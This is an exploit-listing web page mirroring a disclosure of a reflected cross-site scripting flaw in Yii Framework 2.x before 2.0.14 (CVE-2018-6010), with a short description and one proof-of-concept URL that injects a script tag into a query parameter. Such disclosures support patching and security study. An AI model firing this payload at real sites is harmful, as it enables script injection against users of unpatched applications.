Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020115

Below is a copy:

Yii Framework 2.0.9 - Cross Site Scripting
# Exploit Title: Yii Framework 2.0.9 - Cross Site Scripting 
# Discovery Date: 2019-02-12 
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://www.yiiframework.com/
# Version: 2.0.9 
# CVE : 2018-6010


In Yii Framework 2.x before 2.0.14, an reflected XSS vulnerability can be exploited from exception messages printed by the error handler in non-debug mode, related to base/ErrorHandler.php, log/Dispatcher.php, and views/errorHandler/exception.php.


Example:


http://fakewebsite.com/materiel/index?&MaterielTourModel[publication_date]=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3Cscript%3Ealert(%221%22)%3C/script%3E








Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.